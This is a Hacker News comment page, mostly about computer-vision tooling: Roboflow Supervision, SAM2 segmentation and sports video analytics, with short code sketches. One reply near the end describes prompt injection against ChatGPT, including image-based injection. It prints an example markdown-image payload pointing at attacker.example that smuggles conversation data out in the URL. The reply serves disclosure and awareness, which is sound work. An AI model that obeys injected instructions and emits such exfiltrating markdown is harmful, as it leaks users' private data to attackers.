SkalskiP's comments | Hacker News

code: https://colab.research.google.com/github/roboflow-ai/noteboo...

- player and number detection with RF-DETR

- player tracking with SAM2

- team clustering with SigLIP, UMAP and K-Means

- number recognition with SmolVLM2

- perspective conversion with homography (see the sketch after this list)

- player trajectory correction

- shot detection and classification
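The homography step boils down to a couple of OpenCV calls. A minimal sketch with made-up reference coordinates (in practice they come from a pitch keypoint detector):

    import cv2
    import numpy as np

    # four reference points in the broadcast frame (pixels) and their
    # known positions on the pitch plane (meters) - placeholder values
    frame_pts = np.array([[120, 80], [1180, 90], [1230, 650], [70, 640]], dtype=np.float32)
    pitch_pts = np.array([[0, 0], [105, 0], [105, 68], [0, 68]], dtype=np.float32)

    H, _ = cv2.findHomography(frame_pts, pitch_pts)

    # project detected player foot positions onto the pitch radar
    players = np.array([[[640.0, 360.0]]], dtype=np.float32)
    on_pitch = cv2.perspectiveTransform(players, H)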


Use computer vision to automatically extract player and ball positions, plot them on a pitch radar, and calculate advanced metrics.


yup! the point here is to show step by step how to perform video segmentation with SAM2
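For context, the core loop looks roughly like this (a sketch based on the facebookresearch/sam2 package; the config, checkpoint, and click prompt below are placeholders):

    import numpy as np
    from sam2.build_sam import build_sam2_video_predictor

    predictor = build_sam2_video_predictor(
        "configs/sam2.1/sam2.1_hiera_l.yaml", "sam2.1_hiera_large.pt")
    state = predictor.init_state(video_path="video.mp4")

    # prompt object 1 with a single positive click on frame 0
    predictor.add_new_points_or_box(
        inference_state=state, frame_idx=0, obj_id=1,
        points=np.array([[640, 360]], dtype=np.float32),
        labels=np.array([1], dtype=np.int32))

    # propagate the mask through the rest of the video
    for frame_idx, obj_ids, mask_logits in predictor.propagate_in_video(state):
        masks = (mask_logits > 0.0).cpu().numpy()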


Hi! Supervision does not run models, but it connects to existing detection and segmentation libraries, allowing you to do more advanced stuff easily. Take a look here to get a high-level overview: https://supervision.roboflow.com/latest/how_to/detect_and_an....
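For example, pairing Supervision with Ultralytics takes just a few lines (a minimal sketch; the model and image paths are placeholders):

    import cv2
    import supervision as sv
    from ultralytics import YOLO

    image = cv2.imread("image.jpg")
    model = YOLO("yolov8n.pt")

    # run the detector, then hand the results to Supervision
    detections = sv.Detections.from_ultralytics(model(image)[0])
    annotated = sv.BoxAnnotator().annotate(scene=image.copy(), detections=detections)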

As for Roboflow, you can use the `inference` package to run (among other things) all Roboflow Universe models locally. Take a look at README examples: https://github.com/roboflow/inference.
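Roughly like this (a sketch; the model ID is a placeholder):

    import cv2
    from inference import get_model

    # downloads weights on first use, then runs locally
    model = get_model(model_id="yolov8n-640")
    results = model.infer(cv2.imread("image.jpg"))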


Thank you!


You can always slice the images into smaller ones, run detection on each tile, and combine the results. Supervision has a utility for this - https://supervision.roboflow.com/latest/detection/tools/infe..., but it only works with detections. You can get a much more accurate result this way. Here is a side-by-side comparison: https://github.com/roboflow/supervision/releases/tag/0.14.0.
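Usage is roughly as below (a sketch; loading the detector itself is elided):

    import numpy as np
    import supervision as sv

    def callback(tile: np.ndarray) -> sv.Detections:
        # run any detector on a single tile and convert its output
        return sv.Detections.from_ultralytics(model(tile)[0])

    # tiles the image, runs the callback per tile, and merges results
    slicer = sv.InferenceSlicer(callback=callback)
    detections = slicer(image)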


Hi swyx! The easiest way would be to train a custom model to detect raised hands. I found one on Roboflow - https://universe.roboflow.com/search?q=raised%20hand. I'm not sure how good it would be on your images, so I'd recommend adding some of your pictures. Then you just detect hands and detect people and calculate the ratio.
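The last step is just counting (a sketch; `hand_model` and `person_model` stand in for whatever detectors you end up with):

    # both calls assumed to return sv.Detections
    raised_hands = hand_model(image)
    people = person_model(image)

    # guard against frames with no people detected
    ratio = len(raised_hands) / max(len(people), 1)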


Hi everyone! I'm one of the maintainers of Supervision. Thanks for putting our project on the HN front page. It really made my day!


Hi @eloisus! I'm the creator of Supervision. Over the years, I've noticed that there are certain code snippets I find myself rewriting for each of my computer vision projects. My friends in the field have expressed similar frustrations. While OpenCV is fantastic, it can be verbose, and its API is often inconsistent and hard to remember.

Regarding "drawing detections on an image or video," we aim for maximum flexibility. We offer 18 different annotators for detection and segmentation models, available at https://supervision.roboflow.com/latest/annotators. Each annotator is customizable and can be combined with others. Moreover, we strive to simplify the integration of these annotators with the most popular computer vision libraries.

Edit: I just checked your LinkedIn. I think we met at CVPR last year.


Totally agree on OpenCV's Python API being hard to use. If your goal is to build something as foundational as OpenCV, but with a Python-native interface, I'd be excited about that.

I hope I don't come off as critical; I appreciate the work you're doing. I'd really like to see this take off. My only point is that tasks like annotating a video with tracking are things I've only seen in demos. If I could custom-order the reusable parts I want, they would include geometry, camera transforms, lens distortion, etc. Your polygon zone filtering looks eminently useful. Maybe I should shut up and just contribute something.

I remember meeting you! Maybe I'll see you in Seattle this year.


Oh my, if you'd like to contribute lens distortion removal... That would make me super happy!
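For anyone curious, the OpenCV building blocks are already there (a sketch with made-up intrinsics; real values come from cv2.calibrateCamera):

    import cv2
    import numpy as np

    # hypothetical camera matrix and distortion coefficients
    K = np.array([[1000.0, 0.0, 640.0],
                  [0.0, 1000.0, 360.0],
                  [0.0, 0.0, 1.0]])
    dist = np.array([-0.3, 0.1, 0.0, 0.0, 0.0])  # k1, k2, p1, p2, k3

    undistorted = cv2.undistort(frame, K, dist)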

I'm 95% sure I'll be in Seattle this year.


Hi @simonw! Your tweets were the motivation for me to write this blog post. Same with this one: https://blog.roboflow.com/chatgpt-code-interpreter-computer-..., from when I dove deep into Code Interpreter. Most of my jailbreaking and prompt injection adventures are linked to you. Thanks a lot!


Great to see this getting more traction.

Two things I wanted to add:

1) The image markdown data exfiltration was disclosed to OpenAI in April this year, but there is still no fix. It impacts all areas of ChatGPT (e.g. browsing, plugins, code interpreter - beta features) and now image analysis (a default feature). Other vendors have fixed this attack vector via a stricter Content-Security-Policy (e.g. Bing Chat) or by not rendering image markdown at all.

2) Image-based injections work across models; they also apply to Bard and Bing Chat, for example. There was a brief discussion here in July (https://news.ycombinator.com/item?id=36718721) about a first demo.
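For readers unfamiliar with the exfiltration pattern from 1): the injected content instructs the model to emit a markdown image whose URL carries the data, e.g. (a hypothetical payload; attacker.example is a placeholder):

    ![logo](https://attacker.example/log?q=<data the model was told to insert>)

When the chat client renders the image, the browser fetches that URL and the query string leaks to the attacker's server - no user click required.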


It's a good explanation - the more people writing about this stuff the better!


Are you asking in the context of this blog post?

